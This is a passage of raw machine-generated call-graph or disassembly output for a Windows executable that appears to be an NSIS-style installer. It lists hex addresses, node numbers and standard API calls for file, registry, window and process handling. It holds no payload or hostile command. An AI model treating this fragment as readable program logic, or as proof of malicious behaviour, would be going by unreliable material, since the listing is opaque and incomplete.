4006 403ca5 GetSysColor 4005->4006 4007 403ca8 4005->4007 4006->4007 4008 403cb8 SetBkMode 4007->4008 4009 403cae SetTextColor 4007->4009 4010 403cd0 GetSysColor 4008->4010 4011 403cd6 4008->4011 4009->4008 4010->4011 4012 403ce7 4011->4012 4013 403cdd SetBkColor 4011->4013 4012->4014 4015 403d01 CreateBrushIndirect 4012->4015 4016 403cfa DeleteObject 4012->4016 4013->4012 4015->4014 4016->4015 4017 40205d 4018 40143a 18 API calls 4017->4018 4019 40206e SetWindowLongA 4018->4019 4020 402ef6 4019->4020 4026 403065 4027 403074 SetTimer 4026->4027 4028 40308d 4026->4028 4027->4028 4029 4030db 4028->4029 4030 403049 MulDiv 4028->4030 4031 40309b wsprintfA SetWindowTextA SetDlgItemTextA 4030->4031 4031->4029 4040 401d67 4041 401450 18 API calls 4040->4041 4042 401d6f ExpandEnvironmentStringsA 4041->4042 4043 401d82 4042->4043 4045 401d93 4042->4045 4044 401d87 lstrcmpA 4043->4044 4043->4045 4044->4045 4046 404e68 4047 404e89 GetDlgItem GetDlgItem GetDlgItem 4046->4047 4048 40502d 4046->4048 4095 403c3e SendMessageA 4047->4095 4050 405036 GetDlgItem CreateThread CloseHandle 4048->4050 4051 40505e 4048->4051 4050->4051 4053 405089 4051->4053 4055 405075 ShowWindow ShowWindow 4051->4055 4056 4050ab 4051->4056 4052 404efa 4064 4060ec 18 API calls 4052->4064 4054 4050e7 4053->4054 4057 4050c0 ShowWindow 4053->4057 4058 40509a 4053->4058 4054->4056 4065 4050f2 SendMessageA 4054->4065 4097 403c3e SendMessageA 4055->4097 4059 403c70 8 API calls 4056->4059 4062 4050e0 4057->4062 4063 4050d2 4057->4063 4098 403bbe 4058->4098 4069 405026 4059->4069 4068 403bbe SendMessageA 4062->4068 4066 404d10 25 API calls 4063->4066 4067 404f19 4064->4067 4065->4069 4070 40510b CreatePopupMenu 4065->4070 4066->4062 4071 405eff 9 API calls 4067->4071 4068->4054 4072 4060ec 18 API calls 4070->4072 4074 404f24 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4071->4074 4073 40511b AppendMenuA 4072->4073 4075 405141 4073->4075 4076 40512e GetWindowRect 4073->4076 4077 404f8b 4074->4077 4078 404f6f SendMessageA SendMessageA 4074->4078 4079 40514a TrackPopupMenu 4075->4079 4076->4079 4080 404f90 SendMessageA 4077->4080 4081 404f9e 4077->4081 4078->4077 4079->4069 4082 405168 4079->4082 4080->4081 4083 403be5 19 API calls 4081->4083 4085 405184 SendMessageA 4082->4085 4084 404fae 4083->4084 4086 404fb7 ShowWindow 4084->4086 4087 404feb GetDlgItem SendMessageA 4084->4087 4085->4085 4088 4051a1 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4085->4088 4089 404fda 4086->4089 4090 404fcd ShowWindow 4086->4090 4087->4069 4091 40500e SendMessageA SendMessageA 4087->4091 4092 4051c3 SendMessageA 4088->4092 4096 403c3e SendMessageA 4089->4096 4090->4089 4091->4069 4092->4092 4093 4051e4 GlobalUnlock SetClipboardData CloseClipboard 4092->4093 4093->4069 4095->4052 4096->4087 4097->4053 4099 403bc5 4098->4099 4100 403bcb SendMessageA 4098->4100 4099->4100 4100->4056 4101 402de8 4102 40143a 18 API calls 4101->4102 4105 402def 4102->4105 4103 402e40 4107 4060ec 18 API calls 4103->4107 4104 402e33 4106 40143a 18 API calls 4104->4106 4105->4103 4105->4104 4108 4019e4 4105->4108 4106->4108 4107->4108 4109 4022eb 4110 401450 18 API calls 4109->4110 4111 4022f3 GetFileVersionInfoSizeA 4110->4111 4112 402ef6 4111->4112 4113 402318 GlobalAlloc 4111->4113 4113->4112 4114 40232c GetFileVersionInfoA 4113->4114 4115 40236e GlobalFree 4114->4115 4116 40233b VerQueryValueA 4114->4116 4115->4112 4116->4115 4117 402354 4116->4117 4122 405c1f wsprintfA 4117->4122 4120 402360 4123 405c1f wsprintfA 4120->4123 4122->4120 4123->4115 4124 403e6d lstrcpynA lstrlenA 3119 4019f0 3171 401450 3119->3171 3123 401a1b 3124 401a36 3123->3124 3125 401a2e 3123->3125 3217 405cc1 lstrcpynA 3124->3217 3216 405cc1 lstrcpynA 3125->3216 3128 401a41 3218 405fc0 lstrlenA CharPrevA 3128->3218 3129 401a34 3180 405ce3 3129->3180 3136 401a6a CompareFileTime 3143 401a53 3136->3143 3137 401b7b 3190 404d10 3137->3190 3140 405eff 9 API calls 3140->3143 3141 404d10 25 API calls 3144 401b42 3141->3144 3143->3136 3143->3137 3143->3140 3146 405cc1 lstrcpynA 3143->3146 3163 401b22 3143->3163 3170 401b2f 3143->3170 3189 405b31 GetFileAttributesA CreateFileA 3143->3189 3221 405f2f FindFirstFileA 3143->3221 3224 405b11 GetFileAttributesA 3143->3224 3227 4060ec 3143->3227 3245 4059fb 3143->3245 3148 405eff 9 API calls 3144->3148 3146->3143 3147 405eff 9 API calls 3149 401bac 3147->3149 3151 401b5d 3148->3151 3150 401bbb SetFileTime 3149->3150 3152 401bca FindCloseChangeNotification 3149->3152 3150->3152 3152->3151 3154 401bdb 3152->3154 3155 401be0 3154->3155 3156 401bf3 3154->3156 3157 4060ec 18 API calls 3155->3157 3158 4060ec 18 API calls 3156->3158 3160 401be8 lstrcatA 3157->3160 3161 401bfb 3158->3161 3160->3161 3162 405eff 9 API calls 3161->3162 3164 401c06 3162->3164 3165 401b65 3163->3165 3166 401b25 3163->3166 3167 4059fb MessageBoxIndirectA 3164->3167 3168 405eff 9 API calls 3165->3168 3169 405eff 9 API calls 3166->3169 3167->3151 3168->3151 3169->3170 3170->3141 3172 401456 3171->3172 3173 4060ec 18 API calls 3172->3173 3174 401478 3173->3174 3175 401484 3174->3175 3176 405ce3 5 API calls 3174->3176 3177 405eff lstrlenA wvsprintfA 3175->3177 3176->3175 3249 405d7d 3177->3249 3186 405cef 3180->3186 3181 405d58 3182 405d5c CharPrevA 3181->3182 3184 405d77 3181->3184 3182->3181 3183 405d4d CharNextA 3183->3181 3183->3186 3184->3143 3186->3181 3186->3183 3187 405d3b CharNextA 3186->3187 3188 405d48 CharNextA 3186->3188 3260 405a5f 3186->3260 3187->3186 3188->3183 3189->3143 3192 404d29 3190->3192 3197 401b85 3190->3197 3191 404d48 lstrlenA 3193 404d71 3191->3193 3194 404d56 lstrlenA 3191->3194 3192->3191 3195 4060ec 18 API calls 3192->3195 3198 404d84 3193->3198 3199 404d77 SetWindowTextA 3193->3199 3196 404d68 lstrcatA 3194->3196 3194->3197 3195->3191 3196->3193 3201 403347 3197->3201 3198->3197 3200 404d8a SendMessageA SendMessageA SendMessageA 3198->3200 3199->3198 3200->3197 3202 403373 3201->3202 3203 403357 SetFilePointer 3201->3203 3264 4031c9 GetTickCount 3202->3264 3203->3202 3206 403384 ReadFile 3207 401b98 3206->3207 3208 4033a5 3206->3208 3207->3147 3208->3207 3209 4031c9 43 API calls 3208->3209 3210 4033bc 3209->3210 3210->3207 3212 403437 ReadFile 3210->3212 3213 4033cc 3210->3213 3212->3207 3213->3207 3214 4033e7 ReadFile 3213->3214 3215 403400 WriteFile 3213->3215 3214->3207 3214->3213 3215->3207 3215->3213 3216->3129 3217->3128 3219 401a47 lstrcatA 3218->3219 3220 405fdb lstrcatA 3218->3220 3219->3129 3220->3219 3222 405f50 3221->3222 3223 405f45 FindClose 3221->3223 3222->3143 3223->3222 3225 405b20 SetFileAttributesA 3224->3225 3226 405b2e 3224->3226 3225->3226 3226->3143 3243 4060f9 3227->3243 3228 406329 3229 40633e 3228->3229 3316 405cc1 lstrcpynA 3228->3316 3229->3143 3231 4061a0 GetVersion 3231->3243 3232 4062fc lstrlenA 3232->3243 3235 4060ec 10 API calls 3235->3232 3236 406218 GetSystemDirectoryA 3236->3243 3238 40622b GetWindowsDirectoryA 3238->3243 3239 405ce3 5 API calls 3239->3243 3240 4062a2 lstrcatA 3240->3243 3241 40625f SHGetSpecialFolderLocation 3241->3243 3244 406277 SHGetPathFromIDListA CoTaskMemFree 3241->3244 3242 4060ec 10 API calls 3242->3243 3243->3228 3243->3231 3243->3232 3243->3235 3243->3236 3243->3238 3243->3239 3243->3240 3243->3241 3243->3242 3309 405ba8 RegOpenKeyExA 3243->3309 3314 405c1f wsprintfA 3243->3314 3315 405cc1 lstrcpynA 3243->3315 3244->3243 3246 405a10 3245->3246 3247 405a5c 3246->3247 3248 405a24 MessageBoxIndirectA 3246->3248 3247->3143 3248->3247 3250 405da2 3249->3250 3251 405d88 3249->3251 3253 405d99 3250->3253 3254 405de1 3250->3254 3255 405dea lstrcatA lstrlenA WriteFile 3250->3255 3259 405b31 GetFileAttributesA CreateFileA 3250->3259 3252 405d92 CloseHandle 3251->3252 3251->3253 3252->3253 3253->3123 3254->3253 3254->3255 3255->3253 3257 405dcc 3257->3253 3258 405dd6 SetFilePointer 3257->3258 3258->3254 3259->3257 3261 405a65 3260->3261 3262 405a78 3261->3262 3263 405a6b CharNextA 3261->3263 3262->3186 3263->3261 3265 403327 3264->3265 3266 4031f8 3264->3266 3267 4030e1 33 API calls 3265->3267 3277 4031b2 SetFilePointer 3266->3277 3274 40332e 3267->3274 3269 403203 SetFilePointer 3273 403228 3269->3273 3273->3274 3275 4032c1 WriteFile 3273->3275 3276 403318 SetFilePointer 3273->3276 3278 403180 ReadFile 3273->3278 3280 40678d 3273->3280 3287 4030e1 3273->3287 3274->3206 3274->3207 3275->3273 3275->3274 3276->3265 3277->3269 3279 4031a1 3278->3279 3279->3273 3281 4067ad 3280->3281 3284 4067b5 3280->3284 3281->3273 3282 406846 GlobalAlloc 3282->3281 3282->3284 3283 40683d GlobalFree 3283->3282 3284->3281 3284->3282 3284->3283 3285 4068b2 GlobalFree 3284->3285 3286 4068bb GlobalAlloc 3284->3286 3285->3286 3286->3281 3286->3284 3288 403107 3287->3288 3289 4030ef 3287->3289 3291 403117 GetTickCount 3288->3291 3292 40310f 3288->3292 3290 4030f8 DestroyWindow 3289->3290 3297 4030ff 3289->3297 3290->3297 3293 403125 3291->3293 3291->3297 3302 405f8d 3292->3302 3295 40315a CreateDialogParamA ShowWindow 3293->3295 3296 40312d 3293->3296 3295->3297 3296->3297 3306 403049 3296->3306 3297->3273 3299 40313b wsprintfA 3300 404d10 25 API calls 3299->3300 3301 403158 3300->3301 3301->3297 3303 405faa PeekMessageA 3302->3303 3304 405fa0 DispatchMessageA 3303->3304 3305 405fba 3303->3305 3304->3303 3305->3297 3307 403058 3306->3307 3308 40305a MulDiv 3306->3308 3307->3308 3308->3299 3310 405c19 3309->3310 3311 405bdb RegQueryValueExA 3309->3311 3310->3243 3312 405bfc RegCloseKey 3311->3312 3312->3310 3314->3243 3315->3243 3316->3229 4125 401e70 4126 401450 18 API calls 4125->4126 4127 401e78 4126->4127 4128 40143a 18 API calls 4127->4128 4129 401e82 wsprintfA 4128->4129 4130 402e70 4131 40143a 18 API calls 4130->4131 4132 402e77 4131->4132 4133 4060ec 18 API calls 4132->4133 4134 4019e4 4132->4134 4133->4134 4135 404671 4136 404696 4135->4136 4137 40467f 4135->4137 4138 4046a4 IsWindowVisible 4136->4138 4146 4046bb 4136->4146 4139 4046ff 4137->4139 4140 404685 4137->4140 4138->4139 4141 4046b1 4138->4141 4142 404705 CallWindowProcA 4139->4142 4143 403c55 SendMessageA 4140->4143 4154 4045f1 SendMessageA 4141->4154 4145 40468f 4142->4145 4143->4145 4146->4142 4159 405cc1 lstrcpynA 4146->4159 4148 4046ea 4160 405c1f wsprintfA 4148->4160 4150 4046f1 4151 401411 74 API calls 4150->4151 4152 4046f8 4151->4152 4161 405cc1 lstrcpynA 4152->4161 4155 404650 SendMessageA 4154->4155 4156 404614 GetMessagePos ScreenToClient SendMessageA 4154->4156 4158 404648 4155->4158 4157 40464d 4156->4157 4156->4158 4157->4155 4158->4146 4159->4148 4160->4150 4161->4139 4162 40207a GetDlgItem GetClientRect 4163 401450 18 API calls 4162->4163 4164 4020ab LoadImageA SendMessageA 4163->4164 4165 4020c9 DeleteObject 4164->4165 4166 402ef6 4164->4166 4165->4166 4167 402a7a 4168 402a81 4167->4168 4169 402ef6 4167->4169 4170 402a88 CloseHandle 4168->4170 4170->4169 4171 402bfb 4172 402c02 4171->4172 4173 402ef6 4171->4173 4174 402c08 FindClose 4172->4174 4174->4173 4175 403b7c 4176 403b87 4175->4176 4177 403b8b 4176->4177 4178 403b8e GlobalAlloc 4176->4178 4178->4177 4179 402c7f 4180 401450 18 API calls 4179->4180 4182 402c8e 4180->4182 4181 402ca5 4184 405b11 2 API calls 4181->4184 4182->4181 4183 401450 18 API calls 4182->4183 4183->4181 4185 402cab 4184->4185 4207 405b31 GetFileAttributesA CreateFileA 4185->4207 4187 402cb8 4188 402d61 4187->4188 4189 402cc4 GlobalAlloc 4187->4189 4192 405eff 9 API calls 4188->4192 4190 402d58 CloseHandle 4189->4190 4191 402cdd 4189->4191 4190->4188 4208 4031b2 SetFilePointer 4191->4208 4194 402d71 4192->4194 4196 402d7c DeleteFileA 4194->4196 4197 402d8f 4194->4197 4195 402ce3 4198 403180 ReadFile 4195->4198 4196->4197 4199 402cec GlobalAlloc 4198->4199 4200 402d30 WriteFile GlobalFree 4199->4200 4201 402cfc 4199->4201 4203 403347 48 API calls 4200->4203 4202 403347 48 API calls 4201->4202 4205 402d09 4202->4205 4204 402d55 4203->4204 4204->4190 4206 402d27 GlobalFree 4205->4206 4206->4200 4207->4187 4208->4195 3317 402380 3318 402392 3317->3318 3332 402467 3317->3332 3320 401450 18 API calls 3318->3320 3319 401429 25 API calls 3324 402479 3319->3324 3321 40239a 3320->3321 3322 401450 18 API calls 3321->3322 3323 4023a4 3322->3323 3325 4023ba LoadLibraryExA 3323->3325 3326 4023ac GetModuleHandleA 3323->3326 3327 4023cf GetProcAddress 3325->3327 3328 402460 3325->3328 3326->3325 3326->3327 3330 4023e1 3327->3330 3331 40241e 3327->3331 3329 401429 25 API calls 3328->3329 3329->3332 3337 4023f1 3330->3337 3339 401429 3330->3339 3333 404d10 25 API calls 3331->3333 3332->3319 3334 402428 3333->3334 3336 405eff 9 API calls 3334->3336 3336->3337 3337->3324 3338 402452 FreeLibrary 3337->3338 3338->3324 3340 404d10 25 API calls 3339->3340 3341 401437 3340->3341 3341->3337 4209 401000 4210 401037 BeginPaint GetClientRect 4209->4210 4211 40100c DefWindowProcA 4209->4211 4213 4010f3 4210->4213 4214 401179 4211->4214 4215 401073 CreateBrushIndirect FillRect DeleteObject 4213->4215 4216 4010fc 4213->4216 4215->4213 4217 401102 CreateFontIndirectA 4216->4217 4218 401167 EndPaint 4216->4218 4217->4218 4219 401112 6 API calls 4217->4219 4218->4214 4219->4218 4220 402780 4221 402786 4220->4221 4222 4027d4 4221->4222 4223 40278f 4221->4223 4225 401450 18 API calls 4222->4225 4236 40153e 4223->4236 4227 4027dc 4225->4227 4226 402796 4230 401450 18 API calls 4226->4230 4233 4019e4 4226->4233 4228 405eff 9 API calls 4227->4228 4229 4027ec 4228->4229 4240 401488 RegOpenKeyExA 4229->4240 4231 4027a8 RegDeleteValueA 4230->4231 4234 405eff 9 API calls 4231->4234 4235 4027c8 RegCloseKey 4234->4235 4235->4233 4237 40154f 4236->4237 4238 401450 18 API calls 4237->4238 4239 401576 RegOpenKeyExA 4238->4239 4239->4226 4247 4014b4 4240->4247 4248 401500 4240->4248 4241 4014da RegEnumKeyA 4242 4014ec RegCloseKey 4241->4242 4241->4247 4244 405f56 3 API calls 4242->4244 4243 401511 RegCloseKey 4243->4248 4246 4014fc 4244->4246 4245 401488 3 API calls 4245->4247 4246->4248 4249 40152c RegDeleteKeyA 4246->4249 4247->4241 4247->4242 4247->4243 4247->4245 4248->4233 4249->4248 4250 402b01 4251 40143a 18 API calls 4250->4251 4254 402b0b 4251->4254 4252 402b81 4253 402b3f ReadFile 4253->4252 4253->4254 4254->4252 4254->4253 4255 402b83 4254->4255 4256 402b93 4254->4256 4259 405c1f wsprintfA 4255->4259 4256->4252 4258 402ba9 SetFilePointer 4256->4258 4258->4252 4259->4252 3342 403783 #17 SetErrorMode OleInitialize 3414 405f56 GetModuleHandleA 3342->3414 3346 4037f1 GetCommandLineA 3419 405cc1 lstrcpynA 3346->3419 3348 403803 GetModuleHandleA 3349 40381a 3348->3349 3350 405a5f CharNextA 3349->3350 3351 40382e CharNextA 3350->3351 3364 40383b 3351->3364 3352 4038a4 3353 4038b7 GetTempPathA 3352->3353 3420 40370d 3353->3420 3355 4038cd 3357 4038d1 GetWindowsDirectoryA lstrcatA 3355->3357 3358 4038f5 DeleteFileA 3355->3358 3356 405a5f CharNextA 3356->3364 3359 40370d 11 API calls 3357->3359 3428 403472 GetTickCount GetModuleFileNameA 3358->3428 3363 4038ed 3359->3363 3361 4038a6 3525 405cc1 lstrcpynA 3361->3525 3362 403906 3365 40397a 3362->3365 3367 40395f 3362->3367 3370 405a5f CharNextA 3362->3370 3363->3358 3363->3365 3364->3352 3364->3356 3364->3361 3516 403741 3365->3516 3458 4056b1 3367->3458 3373 40391d 3370->3373 3382 4039a5 lstrcatA lstrcmpiA 3373->3382 3383 40393a 3373->3383 3374 403a74 3376 403af7 3374->3376 3379 405f56 3 API calls 3374->3379 3375 40398f 3378 4059fb MessageBoxIndirectA 3375->3378 3377 405d7d 7 API calls 3377->3365 3380 40399d ExitProcess 3378->3380 3381 403a83 3379->3381 3384 405f56 3 API calls 3381->3384 3382->3365 3386 4039c1 CreateDirectoryA SetCurrentDirectoryA 3382->3386 3526 406014 3383->3526 3387 403a8c 3384->3387 3389 4039e3 3386->3389 3390 4039d8 3386->3390 3392 405f56 3 API calls 3387->3392 3543 405cc1 lstrcpynA 3389->3543 3542 405cc1 lstrcpynA 3390->3542 3394 403a95 3392->3394 3396 403ae3 ExitWindowsEx 3394->3396 3403 403aa3 GetCurrentProcess 3394->3403 3396->3376 3399 403af0 3396->3399 3397 403954 3541 405cc1 lstrcpynA 3397->3541 3398 4060ec 18 API calls 3401 403a13 DeleteFileA 3398->3401 3573 401411 3399->3573 3404 403a20 CopyFileA 3401->3404 3405 4039f1 3401->3405 3406 403ab3 3403->3406 3404->3405 3405->3398 3407 403a68 3405->3407 3411 4060ec 18 API calls 3405->3411 3413 403a54 CloseHandle 3405->3413 3544 406342 3405->3544 3570 40599a CreateProcessA 3405->3570 3406->3396 3408 406342 38 API calls 3407->3408 3410 403a6f 3408->3410 3410->3365 3411->3405 3413->3405 3415 405f70 LoadLibraryA 3414->3415 3416 405f7b GetProcAddress 3414->3416 3415->3416 3417 4037c6 SHGetFileInfoA 3415->3417 3416->3417 3418 405cc1 lstrcpynA 3417->3418 3418->3346 3419->3348 3421 405ce3 5 API calls 3420->3421 3422 403719 3421->3422 3423 403723 3422->3423 3424 405fc0 3 API calls 3422->3424 3423->3355 3425 40372b CreateDirectoryA 3424->3425 3576 405b60 3425->3576 3580 405b31 GetFileAttributesA CreateFileA 3428->3580 3430 4034b5 3457 4034c2 3430->3457 3581 405cc1 lstrcpynA 3430->3581 3432 4034d8 3582 405fed lstrlenA 3432->3582 3436 4034e9 GetFileSize 3437 4035e5 3436->3437 3448 403500 3436->3448 3438 4030e1 33 API calls 3437->3438 3439 4035ee 3438->3439 3441 403622 GlobalAlloc 3439->3441 3439->3457 3587 4031b2 SetFilePointer 3439->3587 3440 403180 ReadFile 3440->3448 3444 403639 3441->3444 3443 40367a 3446 4030e1 33 API calls 3443->3446 3449 405b60 2 API calls 3444->3449 3445 40360b 3447 403180 ReadFile 3445->3447 3446->3457 3450 403616 3447->3450 3448->3437 3448->3440 3448->3443 3451 4030e1 33 API calls 3448->3451 3448->3457 3452 40364a CreateFileA 3449->3452 3450->3441 3450->3457 3451->3448 3453 403689 3452->3453 3452->3457 3588 4031b2 SetFilePointer 3453->3588 3455 403697 3456 403347 48 API calls 3455->3456 3456->3457 3457->3362 3459 405f56 3 API calls 3458->3459 3460 4056c5 3459->3460 3461 4056cb 3460->3461 3462 4056dd 3460->3462 3598 405c1f wsprintfA 3461->3598 3463 405ba8 3 API calls 3462->3463 3464 4056fe 3463->3464 3465 40571c lstrcatA 3464->3465 3468 405ba8 3 API calls 3464->3468 3467 4056db 3465->3467 3589 403d3b 3467->3589 3468->3465 3471 406014 18 API calls 3472 40574e 3471->3472 3473 4057d7 3472->3473 3476 405ba8 3 API calls 3472->3476 3474 406014 18 API calls 3473->3474 3475 4057dd 3474->3475 3477 4057ed 3475->3477 3479 4060ec 18 API calls 3475->3479 3478 40577a 3476->3478 3480 40580d LoadImageA 3477->3480 3600 403d1a 3477->3600 3478->3473 3481 405796 lstrlenA 3478->3481 3484 405a5f CharNextA 3478->3484 3479->3477 3482 4058c1 3480->3482 3483 405838 RegisterClassA 3480->3483 3485 4057a4 lstrcmpiA 3481->3485 3486 4057ca 3481->3486 3489 401411 74 API calls 3482->3489 3488 405874 SystemParametersInfoA CreateWindowExA 3483->3488 3515 40396f 3483->3515 3490 405794 3484->3490 3485->3486 3491 4057b4 GetFileAttributesA 3485->3491 3493 405fc0 3 API calls 3486->3493 3488->3482 3494 4058c7 3489->3494 3490->3481 3495 4057c0 3491->3495 3492 405803 3492->3480 3496 4057d0 3493->3496 3497 403d3b 19 API calls 3494->3497 3494->3515 3495->3486 3498 405fed 2 API calls 3495->3498 3599 405cc1 lstrcpynA 3496->3599 3500 4058d8 3497->3500 3498->3486 3501 4058e4 ShowWindow LoadLibraryA 3500->3501 3502 405967 3500->3502 3503 405903 LoadLibraryA 3501->3503 3504 40590a GetClassInfoA 3501->3504 3605 404de2 OleInitialize 3502->3605 3503->3504 3506 405934 DialogBoxParamA 3504->3506 3507 40591e GetClassInfoA RegisterClassA 3504->3507 3509 401411 74 API calls 3506->3509 3507->3506 3508 40596d 3510 405971 3508->3510 3511 405989 3508->3511 3513 40595c 3509->3513 3514 401411 74 API calls 3510->3514 3510->3515 3512 401411 74 API calls 3511->3512 3512->3515 3513->3515 3514->3515 3515->3377 3517 403752 CloseHandle 3516->3517 3518 40375c 3516->3518 3517->3518 3519 403770 3518->3519 3520 403766 CloseHandle 3518->3520 3745 403b29 3519->3745 3520->3519 3525->3353 3800 405cc1 lstrcpynA 3526->3800 3528 406025 3529 405aa0 4 API calls 3528->3529 3530 40602b 3529->3530 3531 405ce3 5 API calls 3530->3531 3538 403945 3530->3538 3537 40603b 3531->3537 3532 40606e lstrlenA 3533 406075 3532->3533 3532->3537 3534 405fc0 3 API calls 3533->3534 3536 40607b GetFileAttributesA 3534->3536 3535 405f2f 2 API calls 3535->3537 3536->3538 3537->3532 3537->3535 3537->3538 3539 405fed 2 API calls 3537->3539 3538->3365 3540 405cc1 lstrcpynA 3538->3540 3539->3532 3540->3397 3541->3367 3542->3389 3543->3405 3545 405f56 3 API calls 3544->3545 3546 40634d 3545->3546 3547 4063aa GetShortPathNameA 3546->3547 3549 40649f 3546->3549 3801 405b31 GetFileAttributesA CreateFileA 3546->3801 3547->3549 3550 4063bf 3547->3550 3549->3405 3550->3549 3552 4063c7 wsprintfA 3550->3552 3551 40638e CloseHandle GetShortPathNameA 3551->3549 3553 4063a2 3551->3553 3554 4060ec 18 API calls 3552->3554 3553->3547 3553->3549 3555 4063ef 3554->3555 3802 405b31 GetFileAttributesA CreateFileA 3555->3802 3557 4063fc 3557->3549 3558 40640b GetFileSize GlobalAlloc 3557->3558 3559 406498 CloseHandle 3558->3559 3560 406429 ReadFile 3558->3560 3559->3549 3560->3559 3561 40643d 3560->3561 3561->3559 3803 406096 lstrlenA 3561->3803 3564 406452 3808 405cc1 lstrcpynA 3564->3808 3565 4064ac 3566 406096 4 API calls 3565->3566 3568 406460 3566->3568 3569 406473 SetFilePointer WriteFile GlobalFree 3568->3569 3569->3559 3571 4059d5 3570->3571 3572 4059c9 CloseHandle 3570->3572 3571->3405 3572->3571 3574 40138f 74 API calls 3573->3574 3575 401426 3574->3575 3575->3376 3577 405b6b GetTickCount GetTempFileNameA 3576->3577 3578 40373f 3577->3578 3579 405b97 3577->3579 3578->3355 3579->3577 3579->3578 3580->3430 3581->3432 3583 405ffb 3582->3583 3584 406000 CharPrevA 3583->3584 3585 4034de 3583->3585 3584->3583 3584->3585 3586 405cc1 lstrcpynA 3585->3586 3586->3436 3587->3445 3588->3455 3590 403d4f 3589->3590 3613 405c1f wsprintfA 3590->3613 3592 403dc0 3593 4060ec 18 API calls 3592->3593 3594 403dcc SetWindowTextA 3593->3594 3595 403de7 3594->3595 3596 403e02 3595->3596 3597 4060ec 18 API calls 3595->3597 3596->3471 3597->3595 3598->3467 3599->3473 3614 405cc1 lstrcpynA 3600->3614 3602 403d2e 3603 405fc0 3 API calls 3602->3603 3604 403d34 lstrcatA 3603->3604 3604->3492 3615 403c55 3605->3615 3607 404e05 3610 405eff 9 API calls 3607->3610 3612 404e30 3607->3612 3618 40138f 3607->3618 3608 403c55 SendMessageA 3609 404e40 OleUninitialize 3608->3609 3609->3508 3610->3607 3612->3608 3613->3592 3614->3602 3616 403c6d 3615->3616 3617 403c5e SendMessageA 3615->3617 3616->3607 3617->3616 3621 401396 3618->3621 3619 401404 3619->3607 3621->3619 3622 4013d1 MulDiv SendMessageA 3621->3622 3623 40158d 3621->3623 3622->3621 3624 4015e4 3623->3624 3651 4015f6 3623->3651 3625 401600 3624->3625 3626 401721 3624->3626 3627 4017a3 3624->3627 3628 401627 3624->3628 3629 4016a9 3624->3629 3630 4015eb 3624->3630 3631 40186f 3624->3631 3632 401733 3624->3632 3633 4018b4 3624->3633 3634 401934 3624->3634 3635 40163b 3624->3635 3636 40199c 3624->3636 3637 40165d 3624->3637 3638 40167f 3624->3638 3639 40175f 3624->3639 3649 4016c2 3624->3649 3624->3651 3648 401450 18 API calls 3625->3648 3743 405c1f wsprintfA 3626->3743 3642 401450 18 API calls 3627->3642 3628->3651 3653 401632 PostQuitMessage 3628->3653 3647 405eff 9 API calls 3629->3647 3646 405eff 9 API calls 3630->3646 3643 401450 18 API calls 3631->3643 3655 401742 ShowWindow 3632->3655 3656 401749 3632->3656 3650 401450 18 API calls 3633->3650 3645 401450 18 API calls 3634->3645 3678 405eff 9 API calls 3635->3678 3654 401450 18 API calls 3636->3654 3641 401450 18 API calls 3637->3641 3740 40143a 3638->3740 3640 401450 18 API calls 3639->3640 3657 401767 3640->3657 3658 401664 3641->3658 3659 4017ab 3642->3659 3660 401876 3643->3660 3662 40193b GetFullPathNameA 3645->3662 3646->3651 3663 4016b3 SetForegroundWindow 3647->3663 3664 401607 3648->3664 3649->3651 3665 40143a 18 API calls 3649->3665 3666 4018bc 3650->3666 3651->3621 3653->3651 3667 4019a4 SearchPathA 3654->3667 3655->3656 3656->3651 3668 401756 ShowWindow 3656->3668 3669 405eff 9 API calls 3657->3669 3670 405eff 9 API calls 3658->3670 3671 405eff 9 API calls 3659->3671 3672 405f2f 2 API calls 3660->3672 3661 401686 3673 405eff 9 API calls 3661->3673 3674 401955 3662->3674 3675 401976 3662->3675 3663->3651 3676 405eff 9 API calls 3664->3676 3665->3651 3677 401450 18 API calls 3666->3677 3667->3651 3668->3651 3679 401777 SetFileAttributesA 3669->3679 3680 40166f 3670->3680 3681 4017bb 3671->3681 3682 40187e 3672->3682 3683 401693 3673->3683 3674->3675 3701 405f2f 2 API calls 3674->3701 3675->3651 3696 40198a GetShortPathNameA 3675->3696 3684 401612 3676->3684 3685 4018c6 3677->3685 3686 40164f 3678->3686 3679->3651 3688 40178c 3679->3688 3689 404d10 25 API calls 3680->3689 3733 405aa0 CharNextA CharNextA 3681->3733 3691 401882 3682->3691 3692 40189b 3682->3692 3693 40169a 3683->3693 3694 40169d Sleep 3683->3694 3695 404d10 25 API calls 3684->3695 3697 401450 18 API calls 3685->3697 3687 40138f 59 API calls 3686->3687 3687->3651 3698 405eff 9 API calls 3688->3698 3689->3651 3699 405eff 9 API calls 3691->3699 3700 405eff 9 API calls 3692->3700 3693->3694 3694->3651 3695->3651 3696->3651 3702 4018d1 3697->3702 3698->3651 3699->3651 3700->3651 3704 401966 3701->3704 3705 405eff 9 API calls 3702->3705 3703 401840 3708 401863 3703->3708 3709 401845 3703->3709 3704->3675 3744 405cc1 lstrcpynA 3704->3744 3707 4018de MoveFileA 3705->3707 3706 405a5f CharNextA 3711 4017d2 CreateDirectoryA 3706->3711 3713 4018f5 3707->3713 3714 4018ee 3707->3714 3716 401429 25 API calls 3708->3716 3710 401429 25 API calls 3709->3710 3715 40184c 3710->3715 3717 4017e7 GetLastError 3711->3717 3718 4017c4 3711->3718 3719 405f2f 2 API calls 3713->3719 3732 401914 3713->3732 3714->3708 3739 405cc1 lstrcpynA 3715->3739 3716->3651 3721 4017f4 GetLastError 3717->3721 3722 40180e GetFileAttributesA 3717->3722 3718->3703 3718->3706 3728 405eff 9 API calls 3718->3728 3723 401900 3719->3723 3726 405eff 9 API calls 3721->3726 3722->3718 3729 406342 38 API calls 3723->3729 3723->3732 3724 401857 SetCurrentDirectoryA 3724->3651 3725 405eff 9 API calls 3727 40192e 3725->3727 3726->3718 3727->3651 3728->3718 3730 40190d 3729->3730 3731 401429 25 API calls 3730->3731 3731->3732 3732->3725 3734 405aba 3733->3734 3738 405ac6 3733->3738 3735 405ac1 CharNextA 3734->3735 3734->3738 3736 405ae3 3735->3736 3736->3718 3737 405a5f CharNextA 3737->3738 3738->3736 3738->3737 3739->3724 3741 4060ec 18 API calls 3740->3741 3742 401449 3741->3742 3742->3661 3743->3651 3744->3675 3746 403b37 3745->3746 3747 403775 3746->3747 3748 403b3c FreeLibrary GlobalFree 3746->3748 3749 4064db 3747->3749 3748->3747 3748->3748 3750 406014 18 API calls 3749->3750 3751 4064ee 3750->3751 3752 4064f7 DeleteFileA 3751->3752 3753 40650e 3751->3753 3754 403781 OleUninitialize 3752->3754 3755 40666e 